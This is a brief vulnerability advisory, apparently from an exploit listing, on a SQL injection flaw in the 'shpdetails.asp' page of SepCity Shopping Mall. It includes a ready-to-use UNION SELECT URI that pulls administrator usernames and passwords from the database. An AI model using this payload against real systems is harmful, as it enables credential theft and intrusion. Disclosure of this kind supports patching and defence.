SepCity Shopping Mall 'shpdetails.asp' SQL Injection Vulnerability

SepCity Shopping Mall 'shpdetails.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators